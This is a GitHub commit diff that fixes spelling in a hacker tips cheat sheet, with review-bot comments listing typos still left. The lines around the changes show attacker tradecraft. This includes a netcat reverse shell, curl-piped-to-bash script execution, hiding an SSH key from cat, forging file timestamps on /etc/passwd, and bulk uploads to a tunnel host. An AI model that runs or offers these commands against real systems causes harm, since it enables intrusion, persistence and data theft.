Merge pull request #27 from NONVME/spell-checking

This commit is contained in:
skyper
2024-07-22 15:24:20 +01:00
committed by GitHub
+14 -14
@@ -19,7 +19,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
1. [Hide a process as root](#hide-a-process-root)
1. [Hide scripts](#hide-scripts)
1. [Hide from cat](#cat)
1. [Execute in parrallel with separate logfiles](#parallel)
1. [Execute in parallel with separate logfiles](#parallel)
1. [SSH](#ssh)
1. [Almost invisible SSH](#ssh-invisible)
1. [Multiple shells via 1 SSH/TCP connection](#ssh-master)
@@ -304,7 +304,7 @@ Note: We use `echo -e` to convert `\\033` to the ANSI escape character (hex 0x1b
Adding a `\r` (carriage return) goes a long way to hide your ssh key from `cat`:
```shell
echo "ssh-ed25519 AAAAOurPublicKeyHere....blah x@y"$'\r'"$(<authorized_keys)" >authorized_keys
### This adds our key as the first key and 'cat authorized_keys' wont show
### This adds our key as the first key and 'cat authorized_keys' won't show
### it. The $'\r' is a bash special to create a \r (carriage return).
```
@@ -499,7 +499,7 @@ nmap -r -sn -PR 192.168.0.1/24
```
```sh
## ICMP discover computers on the local netowrk
## ICMP discover computers on the local netowork
NET="10.11.0" # discover 10.11.0.1-10.11.0.254
seq 1 254 | xargs -P20 -I{} ping -n -c3 -i0.2 -w1 -W200 "${NET:-192.168.0}.{}" | grep 'bytes from' | awk '{print $4" "$7;}' | sort -uV -k1,1
```
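Review bot: The replacement comment line in this hunk is still misspelled: "netowrk" was changed to "netowork", not "network". Suggest `## ICMP discover computers on the local network` so the spelling fix actually lands.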
@@ -664,14 +664,14 @@ GS_HOST=213.171.212.212 gs-netcat -i -s ...
<a id="ghost"></a>
**3.vi.c Ghsot IP / IP Spoofing**
Useful on a host inside the target network. This tool re-configured (without trace) the SHELL: Any programm (nmap, cme, ...) started from this SHELL will use a fake IP. All your attacks will originate from a host that does not exist.
Useful on a host inside the target network. This tool re-configured (without trace) the SHELL: Any program (nmap, cme, ...) started from this SHELL will use a fake IP. All your attacks will originate from a host that does not exist.
```sh
source <(curl -fsSL https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/ghostip.sh)
```
This also works in combination with:
* [Segfault's ROOT Servers](https://thc.org/segfault/wireguard): Will connect your ROOT Server to the TARGET NETWORK and using a Ghost IP inside the taget network.
* [Segfault's ROOT Servers](https://thc.org/segfault/wireguard): Will connect your ROOT Server to the TARGET NETWORK and using a Ghost IP inside the target network.
* [QEMU Tunnels](https://securelist.com/network-tunneling-with-qemu/111803/): As above, but less secure.
---
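Review bot: Two spelling issues survive this hunk: the heading in the unchanged context line still reads "Ghsot IP / IP Spoofing" (should be "Ghost IP"), and the rewritten sentence keeps "This tool re-configured (without trace) the SHELL", which should be present tense, "This tool re-configures (without trace) the SHELL". Since the Segfault bullet is being touched anyway, "and using a Ghost IP inside the target network" would read better as "and use a Ghost IP inside the target network".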
@@ -1202,7 +1202,7 @@ A list of our [favorite public upload sites](#cloudexfil).
<a id="rsync"></a>
### 4.viii. File transfer - using rsync
Ideal for synchonizing large amount of directories or re-starting broken transfers. The example transfers the directory '*warez*' to the Receiver using a single TCP connection from the Sender to the Receiver.
Ideal for synchronizing large amount of directories or re-starting broken transfers. The example transfers the directory '*warez*' to the Receiver using a single TCP connection from the Sender to the Receiver.
Receiver:
```posh
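Review bot: The corrected line keeps the grammatical slip "large amount of directories"; directories are countable, so "a large number of directories" is the right form. Suggest `Ideal for synchronizing a large number of directories or re-starting broken transfers.`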
@@ -1273,7 +1273,7 @@ On another server:
curl -T file.dat https://example-foo-bar-lights.trycloudflare.com
# Create a directory remotely
curl -X MKCOL https://example-foo-bar-lights.trycloudflare.com/sources
# Create a directory hirachy remotely
# Create a directory hierarchy remotely
find . -type d | xargs -I{} curl -X MKCOL https://example-foo-bar-lights.trycloudflare.com/sources/{}
# Upload all *.c files (in parallel):
find . -name '*.c' | xargs -P10 -I{} curl -T{} https://example-foo-bar-lights.trycloudflare.com/sources/{}
@@ -1334,7 +1334,7 @@ nc -nvlp 1524
After connection, [upgrade](#reverse-shell-interactive) your shell to a fully interactive PTY shell. Alternatively use [pwncat-cs](https://pwncat.org/) instead of netcat:
```sh
pwncat -lp 1524
# Press "Ctrl-C" if pwncat gets stuck at "registerd new host ...".
# Press "Ctrl-C" if pwncat gets stuck at "registered new host ...".
# Then type "back" to get the prompt of the remote shell.
```
@@ -1411,7 +1411,7 @@ Variant if *'-e'* is not supported:
```
* On modern shells this can be shortened to `{ nc 3.13.3.7 1524 </dev/fd/2|sh;} 2>&1|:`. (*thanks IA_PD*).
* The `| :` trick wont work on C-Shell/tcsh (FreeBSD), orignal Bourne shell (Solaris) or Korn shell (AIX). Use `mkfifo` instead.
* The `| :` trick won't work on C-Shell/tcsh (FreeBSD), original Bourne shell (Solaris) or Korn shell (AIX). Use `mkfifo` instead.
Variant for older */bin/sh*:
```sh
@@ -1501,7 +1501,7 @@ exec python -c 'import pty; pty.spawn("/bin/bash")'
...and if we also like to use Ctrl-C etc then we have to go all the way and upgrade the reverse shell to a real fully colorful interactive shell:
```sh
# On the target host spwan a PTY using any of the above examples:
# On the target host spawn a PTY using any of the above examples:
python -c 'import pty; pty.spawn("/bin/bash")'
# Now Press Ctrl-Z to suspend the connection and return to your own terminal.
```
@@ -1782,7 +1782,7 @@ Note: Or delete the file and then fill the entire harddrive with /dev/urandom an
<a id="restore-timestamp"></a>
**8.ii. Restore the date of a file**
Let's say you have modified */etc/passwd* but the file date now shows that */etc/passwd* has been modifed. Use *touch* to change the file data to the date of another file (in this example, */etc/shadow*)
Let's say you have modified */etc/passwd* but the file date now shows that */etc/passwd* has been modified. Use *touch* to change the file data to the date of another file (in this example, */etc/shadow*)
```sh
touch -r /etc/shadow /etc/passwd
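Review bot: The changed sentence still says "Use *touch* to change the file data to the date of another file"; `touch -r` only copies the access and modification timestamps, so this should read "change the file date". Suggest `Use *touch* to change the file date to the date of another file (in this example, */etc/shadow*)`.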
@@ -1932,7 +1932,7 @@ fusermount -u .sec
<a id="encrypting-file"></a>
**9.iii Encrypting a file**
Encrypt your 0-Days and log files before transfering them - please. (and pick your own password):
Encrypt your 0-Days and log files before transferring them - please. (and pick your own password):
```sh
# Encrypt
@@ -2159,7 +2159,7 @@ crt() {
| https://archive.org/web/ | Historical view of websites |
| https://www.farsightsecurity.com/solutions/dnsdb/ | DNS search (not free) |
| https://wigle.net/ | Wireless Network Mapper |
| https://radiocells.org/ | Cell Tower Informations |
| https://radiocells.org/ | Cell Tower Information |
| https://www.shodan.io/ | Search Engine to find devices & Banners (not free) |
| https://spur.us/context/me | IP rating `https://spur.us/context/<IP>` |
| http://drs.whoisxmlapi.com | Reverse Whois Lookup (not free) |
@@ -2210,7 +2210,7 @@ Exploits
System Information Gathering
1. `curl -fsSL https://thc.org/ws | bash` - Show all domains hosted on a server + system-information
1. https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS - Quick system informations for hackers.
1. https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS - Quick system information for hackers.
1. https://github.com/zMarch/Orc - Post-exploit tool to find local RCE (type `getexploit` after install)
1. https://github.com/The-Z-Labs/linux-exploit-suggester - Suggest exploits based on versions on target system
1. https://github.com/efchatz/pandora - Windows: dump password from various password managers